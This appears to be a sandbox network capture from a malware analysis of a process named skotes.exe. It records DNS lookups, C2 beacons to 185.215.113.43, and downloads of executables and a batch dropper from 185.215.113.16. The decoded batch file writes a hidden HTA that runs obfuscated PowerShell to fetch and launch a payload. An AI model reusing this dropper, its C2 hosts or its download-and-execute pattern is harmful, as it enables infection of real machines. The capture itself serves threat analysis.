Jan 7, 2025 10:09:16.647875071 CET	1.1.1.1	192.168.2.4	0x94fc	Name error (3)	wholersorie.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.694715023 CET	1.1.1.1	192.168.2.4	0x4d29	Name error (3)	framekgirus.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.744204998 CET	1.1.1.1	192.168.2.4	0xe9cd	Name error (3)	tirepublicerj.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.774115086 CET	1.1.1.1	192.168.2.4	0xac1a	Name error (3)	noisycuttej.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.833615065 CET	1.1.1.1	192.168.2.4	0xae40	Name error (3)	rabidcowse.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.879621983 CET	1.1.1.1	192.168.2.4	0x6870	Name error (3)	cloudewahsj.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.892220020 CET	1.1.1.1	192.168.2.4	0xdccf	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.353601933 CET	1.1.1.1	192.168.2.4	0x16a4	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.353601933 CET	1.1.1.1	192.168.2.4	0x16a4	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.353601933 CET	1.1.1.1	192.168.2.4	0x16a4	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.353601933 CET	1.1.1.1	192.168.2.4	0x16a4	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.353601933 CET	1.1.1.1	192.168.2.4	0x16a4	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.353601933 CET	1.1.1.1	192.168.2.4	0x16a4	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.353601933 CET	1.1.1.1	192.168.2.4	0x16a4	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:23.277928114 CET	1.1.1.1	192.168.2.4	0xeafb	No error (0)	undesirabkel.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:23.277928114 CET	1.1.1.1	192.168.2.4	0xeafb	No error (0)	undesirabkel.click		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:42.109185934 CET	1.1.1.1	192.168.2.4	0xde6b	No error (0)	cureprouderio.click		172.67.132.7	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:42.109185934 CET	1.1.1.1	192.168.2.4	0xde6b	No error (0)	cureprouderio.click		104.21.4.114	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:49.710375071 CET	1.1.1.1	192.168.2.4	0xd666	No error (0)	vanaheim.cn		176.53.146.188	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49793	185.215.113.43	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:05.052862883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 7, 2025 10:08:05.769717932 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49809	185.215.113.43	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:07.289242029 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 32 32 43 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB22C77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jan 7, 2025 10:08:08.077176094 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 63 34 31 0d 0a 20 3c 63 3e 31 30 33 31 32 36 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 66 66 37 61 37 64 66 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 33 32 31 34 31 30 32 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 66 66 37 61 37 64 66 33 30 39 33 34 63 37 33 62 30 35 63 61 61 34 65 34 35 35 38 23 31 30 33 32 36 31 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 35 63 31 66 65 65 39 30 31 61 37 64 36 38 30 31 32 66 65 61 31 64 65 38 64 37 63 34 62 35 65 38 66 37 62 32 63 34 36 64 39 35 34 34 30 32 62 37 35 63 61 62 35 65 35 37 34 32 31 62 39 64 63 34 65 31 23 31 30 33 32 36 32 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 [TRUNCATED] Data Ascii: c41 <c>1031268001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fff7a7df30804042ba5ce902415450#1032141021+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fff7a7df30934c73b05caa4e4558#1032619001+++b5937c1ad0c0f9c35c1fee901a7d68012fea1de8d7c4b5e8f7b2c46d954402b75cab5e57421b9dc4e1#1032622001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9a2ac2171beb04bc151303719c8be930a5fc9a5536e6#1032624001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9e27c5171ce600bd1e1503419ad8b43383a99a5536e6#1032645001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9326cb1215ec04b11a0b4d478ceaf70b99e3d1482b#1032672001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9d2fc41815e805b21d170363bcd3d012b4a69a5536e6#1032884001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9d2cc1131fe904b715100371c189ce0deaaa9a5536e6#1032914001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c27c2181fed06bc1e10036fb6ebfe13e3fb9a5536e6#1033224001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2ec0 [TRUNCATED]
Jan 7, 2025 10:08:08.077189922 CET	224	IN	Data Raw: 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 61 36 64 39 66 34 34 34 32 66 31 34 31 65 35 34 32 34 30 34 33 35 Data Ascii: 1001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbca6d9f4442f141e542404358d6d9fc1d#1033552001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc076865555f141e542404358d6d9fc1d#1033553001+++b5937c1a99d5f9df0b5da
Jan 7, 2025 10:08:08.077210903 CET	1236	IN	Data Raw: 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 38 36 61 39 34 34 37 34 61 62 38 35 35 65 32 30 33 35 36 34 64 35 62 39 63 64 33 65 39 35 36 62 37 62 35 64 31 23 31 30 33 33 35 35 34 30 30 31 2b 2b Data Ascii: fc85062384760ac02b4ded8abeee1fbd86a94474ab855e203564d5b9cd3e956b7b5d1#1033554001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc87e815149ac1cf64d4a485a9592e100b7#1033555001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e8644
Jan 7, 2025 10:08:08.077224016 CET	632	IN	Data Raw: 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 33 33 35 36 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 34 66 Data Ascii: 04042ba5ce902415450#1033566001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1033567001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9e2dc0131fef02b7141003769acdb24da2be9a5536e6#1033568001+++b5937c1a99d5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49816	185.215.113.16	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:08.086257935 CET	55	OUT	GET /test/random.exe HTTP/1.1 Host: 185.215.113.16
Jan 7, 2025 10:08:08.805921078 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:07 GMT Content-Type: application/octet-stream Content-Length: 93696 Last-Modified: Tue, 07 Jan 2025 03:25:56 GMT Connection: keep-alive ETag: "677c9ec4-16e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 14 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL]@]2V0@lqpt<.code~8: `.textbP> `.rdata304@@.datapL@.rsrc^@@
Jan 7, 2025 10:08:08.805943966 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ac 00 00 00 68 00 00 00 00 68 68 80 41 00 e8 5c 40 00 00 83 c4 0c 68 00 00 00 00 Data Ascii: hhhhA\@hU@lAhhhB@hA?\|pAA}GTx}:CC.pAtA?h?APAP1Phh
Jan 7, 2025 10:08:08.805958033 CET	1236	IN	Data Raw: ff 8d 54 24 0c 52 68 00 00 00 00 68 05 00 00 00 68 01 00 00 00 68 04 00 00 00 e8 a9 cd 00 00 8d 54 24 14 52 68 00 00 00 00 68 05 00 00 00 68 01 00 00 00 68 04 00 00 00 e8 8b cd 00 00 ff 74 24 04 e8 1c 8d 00 00 8b 44 24 50 eb 02 31 c0 ff 34 24 e8 Data Ascii: T$RhhhhT$Rhhhht$D$P14$Pt$t$X@_[]US$Ju6A2AuAt1!&pAP5AA$D$$;D$R
Jan 7, 2025 10:08:08.805969954 CET	1236	IN	Data Raw: 50 50 50 e8 e6 cc 00 00 b8 ff 70 41 00 a3 8c 80 41 00 c7 04 24 00 00 00 00 eb 00 b8 03 00 00 00 3b 04 24 7c 64 a1 8c 80 41 00 0f be 00 89 44 24 04 ff 05 8c 80 41 00 52 e8 71 cb 00 00 5a 50 52 e8 69 cb 00 00 5a 50 8b 5c 24 0c 6b db ff 53 e8 fa 43 Data Ascii: PPPpAA$;$\|dAD$ARqZPRiZP\$kSCD$PT$RFZPRT$RD$Pj$qhD$RZPRZPD$P8t$h$pAPt$ `6RZPRZPt$AP
Jan 7, 2025 10:08:08.805980921 CET	1236	IN	Data Raw: 74 24 08 e8 a2 c7 00 00 ff 74 24 14 e8 99 c7 00 00 ff 74 24 10 e8 90 c7 00 00 83 c4 18 5b 5d c3 53 31 c0 50 50 e8 f0 c7 00 00 ff 74 24 14 e8 27 33 00 00 52 e8 a1 c6 00 00 5a 50 52 e8 99 c6 00 00 5a 50 e8 0a 78 00 00 8d 44 24 04 50 e8 c8 c6 00 00 Data Ascii: t$t$t$[]S1PPt$'3RZPRZPxD$P4$4\$!~IRrZPD$P$RXZPR*pART$RD$Pq$R&ZPRD$PTT$RZPRXPK2Z!f4$
Jan 7, 2025 10:08:08.806057930 CET	1236	IN	Data Raw: 00 00 5a 50 ff 35 74 80 41 00 68 03 00 00 00 ff 74 24 1c e8 be 34 00 00 e8 e9 c3 00 00 ff 35 bc 80 41 00 e8 40 2e 00 00 01 54 24 04 e8 dc 6a 00 00 e8 50 2e 00 00 68 00 00 00 00 e8 60 fc ff ff eb 0a 68 00 00 00 00 e8 54 fc ff ff 8b 54 24 0c 52 e8 Data Ascii: ZP5tAht$45A@.T$jP.h`hTT$RZPRHXP-Zft$Yt$P4$Ht$?[S1PPPPT$$,T$L$,ht$hED$\|$tt$t$D$t$@
Jan 7, 2025 10:08:08.806070089 CET	776	IN	Data Raw: bd 00 00 5a 50 52 e8 c7 be 00 00 8b 15 c4 80 41 00 52 e8 bb be 00 00 8b 5c 24 24 8b 2d f0 80 41 00 6b db 0c 01 dd 8b 55 04 52 e8 a3 be 00 00 8d 44 24 3c 50 e8 39 bd 00 00 ff 35 a0 80 41 00 8b 44 24 08 50 ff 74 24 3c e8 b4 e9 ff ff ff 74 24 08 ff Data Ascii: ZPRAR\$$-AkURD$<P95AD$Pt$<t$t$t$<t$D=Au\$ -Akut$<O\|$0$t$05AD$4t$4RPD$D$5AD$Pt$<.t$4VzRPD$D$\$4S?z
Jan 7, 2025 10:08:08.806082010 CET	1236	IN	Data Raw: 00 5a 50 52 e8 21 ba 00 00 5a 50 52 e8 19 ba 00 00 5a 50 a1 d8 80 41 00 99 52 50 e8 4a 36 00 00 e8 05 bc 00 00 ff 35 90 80 41 00 e8 5c 26 00 00 01 54 24 04 e8 76 6e 00 00 e8 6c 26 00 00 e8 d8 e9 ff ff b8 01 00 00 00 eb 02 31 c0 ff 74 24 24 e8 a5 Data Ascii: ZPR!ZPRZPARPJ65A\&T$vnl&1t$$t$(t$84$D[]U$Ju$PT%,$f}t1$]1PPPt$%T$$$h'QvD$h't$t$%R5
Jan 7, 2025 10:08:08.806094885 CET	1236	IN	Data Raw: 52 e8 50 b5 00 00 5a 50 52 e8 48 b5 00 00 5a 50 68 01 00 00 00 ff 35 a0 80 41 00 e8 96 a7 00 00 e8 93 21 00 00 01 14 24 e8 b9 2e 00 00 8d 44 24 04 50 e8 5f b5 00 00 52 e8 19 b5 00 00 5a 50 52 e8 11 b5 00 00 5a 50 52 e8 09 b5 00 00 5a 50 52 e8 01 Data Ascii: RPZPRHZPh5A!$.D$P_RZPRZPRZPRZPht$QN!$t.D$P4$D$RZPt$8!RZPRZP$pAP5AbD$PT$1 FRvZPRnZPRfZPR
Jan 7, 2025 10:08:08.806164026 CET	1236	IN	Data Raw: 76 00 00 89 c3 21 db 7e 2a ff 35 00 81 41 00 e8 1b 76 00 00 ff 35 00 81 41 00 e8 25 76 00 00 09 c0 74 10 8b 2d 04 81 41 00 ff 75 08 e8 98 79 00 00 eb e1 ff 35 f8 80 41 00 e8 e7 75 00 00 89 04 24 8b 1c 24 21 db 7e 44 68 05 00 00 00 68 00 00 00 00 Data Ascii: v!~*5Av5A%vt-Auy5Au$$!~Dhhh5A:5Au5Aut-Au1[]S1PPt$TT$$t$1;$u$RZPRZPxD$P9;$u#
Jan 7, 2025 10:08:08.810885906 CET	1236	IN	Data Raw: 00 5a 50 52 e8 a5 ab 00 00 5a 50 52 e8 9d ab 00 00 5a 50 52 e8 95 ab 00 00 5a 50 68 03 00 00 00 ff 74 24 2c e8 e5 9d 00 00 e8 e2 17 00 00 01 14 24 e8 08 25 00 00 8d 44 24 20 50 e8 ae ab 00 00 52 e8 68 ab 00 00 5a 50 52 e8 60 ab 00 00 5a 50 52 e8 Data Ascii: ZPRZPRZPRZPht$,$%D$ PRhZPR`ZPRXZPRPZPht$0$$D$$PiR#ZPht$(*RZPht$AP,RZPht$ D$(PRZPht$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49840	185.215.113.43	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:11.226418972 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 31 32 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1031268001&unit=246122658369
Jan 7, 2025 10:08:11.929605007 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49843	185.215.113.16	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:11.937875032 CET	54	OUT	GET /test/am_no.bat HTTP/1.1 Host: 185.215.113.16
Jan 7, 2025 10:08:12.638807058 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:11 GMT Content-Type: application/octet-stream Content-Length: 2806 Last-Modified: Sun, 05 Jan 2025 01:22:30 GMT Connection: keep-alive ETag: "6779ded6-af6" Accept-Ranges: bytes Data Raw: ef bb bf 40 65 63 68 6f 20 6f 66 66 0d 0a 69 66 20 22 25 7e 31 22 20 3d 3d 20 22 22 20 28 73 74 61 72 74 20 22 22 20 2f 6d 69 6e 20 22 25 63 6f 6d 73 70 65 63 25 22 20 2f 63 20 22 25 7e 66 30 22 20 61 6e 79 5f 77 6f 72 64 20 26 20 65 78 69 74 20 2f 62 29 0d 0a 0d 0a 73 65 74 20 22 66 69 6c 65 50 61 74 68 3d 25 53 79 73 74 65 6d 44 72 69 76 65 25 5c 54 65 6d 70 22 0d 0a 69 66 20 6e 6f 74 20 65 78 69 73 74 20 22 25 66 69 6c 65 50 61 74 68 25 22 20 28 0d 0a 20 20 20 20 6d 6b 64 69 72 20 22 25 66 69 6c 65 50 61 74 68 25 22 0d 0a 20 20 20 20 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 20 20 20 20 69 66 20 6e 6f 74 20 65 78 69 73 74 20 22 25 66 69 6c 65 50 61 74 68 25 22 20 65 78 69 74 20 2f 62 0d 0a 29 0d 0a 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 2a 22 20 25 25 69 20 69 6e 20 28 27 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 22 2d 6a 6f 69 6e 20 28 28 34 38 2e 2e 35 37 29 20 2b 20 28 36 35 2e 2e 39 30 29 20 2b 20 28 39 37 2e 2e 31 32 32 29 20 7c 20 47 65 74 2d 52 [TRUNCATED] Data Ascii: @echo offif "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)set "filePath=%SystemDrive%\Temp"if not exist "%filePath%" ( mkdir "%filePath%" timeout /t 2 >nul if not exist "%filePath%" exit /b)for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"set "fileName=%randomName%.txt"set "gifFile=%randomName%.gif"set "htaFile=%randomName%.hta"if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"( echo ^<script^> echo try { echo moveTo(-100, -100^); echo resizeTo(0, 0^); echo var a = new ActiveXObject('Wscript.Shell'^); echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6
Jan 7, 2025 10:08:12.638827085 CET	1236	IN	Data Raw: 66 25 25 37 37 25 25 35 33 25 25 37 34 25 25 37 39 25 25 36 63 25 25 36 35 25 25 32 30 25 25 34 38 25 25 36 39 25 25 36 34 25 25 36 34 25 25 36 35 25 25 36 65 25 25 32 30 25 25 32 34 25 25 36 34 25 25 33 64 25 25 32 34 25 25 36 35 25 25 36 65 25 Data Ascii: f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%64%%65%%6e%%20%%24%%64%%3d%%24%%65%%6e%%76%%3a%%74%%65%%6d%%70%%2b%%27%%5c%%34%%38%%33%%64%%32%%66%%61%%38%%61%%30%%64%%35%%33%%38%%31%%38%%33%%30%%36%%65%%66%%65%%62%%33%%32%%64%%33%%2e%%65%%78%%65%%
Jan 7, 2025 10:08:12.638839006 CET	597	IN	Data Raw: 38 2e 2e 35 37 29 20 2b 20 28 36 35 2e 2e 39 30 29 20 2b 20 28 39 37 2e 2e 31 32 32 29 20 7c 20 47 65 74 2d 52 61 6e 64 6f 6d 20 2d 43 6f 75 6e 74 20 39 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 5b 63 68 61 72 5d 24 5f 7d 29 22 27 Data Ascii: 8..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "duplicateName=%%i" copy "%filePath%\%gifFile%" "%filePath%\%duplicateName%.gif" move "%filePath%\%duplicateName%.gif" "%filePath%\%duplicateN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49860	185.215.113.43	80	7768	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:14.804812908 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 31 34 31 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032141021&unit=246122658369
Jan 7, 2025 10:08:15.511986971 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49884	185.215.113.16	80	7432	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:18.807509899 CET	79	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Connection: Keep-Alive
Jan 7, 2025 10:08:19.515887976 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:08:18 GMT Content-Type: application/octet-stream Content-Length: 3231232 Last-Modified: Tue, 07 Jan 2025 09:07:07 GMT Connection: keep-alive ETag: "677ceebb-314e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 50 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfP1@1+2@Wk8181 @.rsrc@.idata @ububvwau**@gjmvneib@1&1@.taggant0P1",1@
Jan 7, 2025 10:08:19.515911102 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 7, 2025 10:08:19.515923023 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 7, 2025 10:08:19.515942097 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
